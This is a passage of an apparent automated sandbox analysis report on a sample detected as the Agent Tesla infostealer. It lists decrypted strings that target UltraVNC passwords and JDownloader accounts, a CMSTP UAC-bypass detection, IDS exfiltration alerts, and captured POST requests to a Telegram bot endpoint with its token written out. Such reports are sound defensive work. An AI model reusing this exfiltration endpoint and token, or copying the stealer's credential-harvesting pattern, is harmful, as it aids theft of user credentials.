Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: passwd
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: UltraVNC
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: passwd2
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: UltraVNC
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: passwd
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: UltraVNC
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: passwd2
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: UltraVNC
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: passwd
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: UltraVNC
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: passwd2
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: UltraVNC
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: passwd
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: UltraVNC
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: passwd2
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: JDownloader 2.0
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: JDownloader 2.0\cfg
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: JDownloader 2.0\cfg

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO54782322024.exe PID: 6844, type: MEMORYSTR

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49881 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49882 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49909 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49915 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49921 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49946 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49948 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50028 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50029 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50030 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50034 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50035 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50037 version: TLS 1.2

Source: PO54782322024.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\user\Desktop\PO54782322024.PDB source: PO54782322024.exe, 00000000.00000002.1904079587.0000006C6E393000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F0439D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F0439D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb*+T source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: System.pdb`w. source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: RegSvcs.pdb, source: AppPoint.exe, 00000006.00000000.1791457850.0000000000DA2000.00000002.00000001.01000000.00000009.sdmp, AppPoint.exe.2.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb.0K source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: RegSvcs.pdb source: AppPoint.exe, 00000006.00000000.1791457850.0000000000DA2000.00000002.00000001.01000000.00000009.sdmp, AppPoint.exe.2.dr
Source:	Binary string: .pdbHJ source: PO54782322024.exe, 00000000.00000002.1904079587.0000006C6E393000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbnt[ source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbuery actR source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: System.Core.ni.pdb source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: C:\Users\user\Desktop\PO54782322024.exe11-F424491E3931}\InprocServer32objr\x86\Microsoft.VisualBasic.pdb64\v4.0.30319\diasymreader.dll source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb13 source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: System.Core.pdbPD source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb~?5 source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdbP source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: 9nlpC:\Users\user\Desktop\PO54782322024.PDB source: PO54782322024.exe, 00000000.00000002.1904079587.0000006C6E393000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: PO54782322024.PDB source: PO54782322024.exe, 00000000.00000002.1904079587.0000006C6E393000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3F0B.tmp.dmp.5.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49734 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49732 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49732 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49734
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49732
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49849 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49817 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49817 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49915 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49861 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49817
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49818 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49882 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49968 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49909 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49948 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50028 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50029 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50030 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50031 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50036 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50000 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49921 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50006 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50034 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50032 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50035 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49969 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd1587a9f4ac63Host: api.telegram.orgContent-Length: 968Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd15a4f24f5ee0Host: api.telegram.orgContent-Length: 6683Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd20d7ce7df7a9Host: api.telegram.orgContent-Length: 930Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd20dd74936aabHost: api.telegram.orgContent-Length: 66950Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd26c0b81f4a09Host: api.telegram.orgContent-Length: 66950Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd2db458e448f1Host: api.telegram.orgContent-Length: 66950Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd33c42d569f7aHost: api.telegram.orgContent-Length: 66950Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd3e24c46652e2Host: api.telegram.orgContent-Length: 66946Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd4046245e9326Host: api.telegram.orgContent-Length: 66946Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd42db9af1601bHost: api.telegram.orgContent-Length: 66946Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd4a9ba686c827Host: api.telegram.orgContent-Length: 66946Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd4ec7e1fd0ec5Host: api.telegram.orgContent-Length: 66946Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd50f26f7fcbb6Host: api.telegram.orgContent-Length: 66946Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd567673718542Host: api.telegram.orgContent-Length: 66946Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd590601fddccaHost: api.telegram.orgContent-Length: 66946Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6453ae6e3e4eHost: api.telegram.orgContent-Length: 66944Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6834711be7f9Host: api.telegram.orgContent-Length: 66944Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6b8cf29bbe5cHost: api.telegram.orgContent-Length: 66944Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6fcfbb3027c3Host: api.telegram.orgContent-Length: 66944Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd725dd3d8b1e0Host: api.telegram.orgContent-Length: 66944Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd7790d94bd903Host: api.telegram.orgContent-Length: 68584Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd7eb6d4e31816Host: api.telegram.orgContent-Length: 67091Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd821a08413a24Host: api.telegram.orgContent-Length: 66944Expect: 100-continue

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd1587a9f4ac63Host: api.telegram.orgContent-Length: 968Expect: 100-continueConnection: Keep-Alive

Source: RegSvcs.exe, 00000002.00000002.4116925393.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: AppPoint.exe, 00000006.00000002.1794954358.00000000014A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic
Source: RegSvcs.exe, 00000002.00000002.4116925393.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: RegSvcs.exe, 00000002.00000002.4116925393.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: RegSvcs.exe, 00000002.00000002.4116925393.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.4116925393.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/
Source: RegSvcs.exe, 00000002.00000002.4116925393.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument

Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
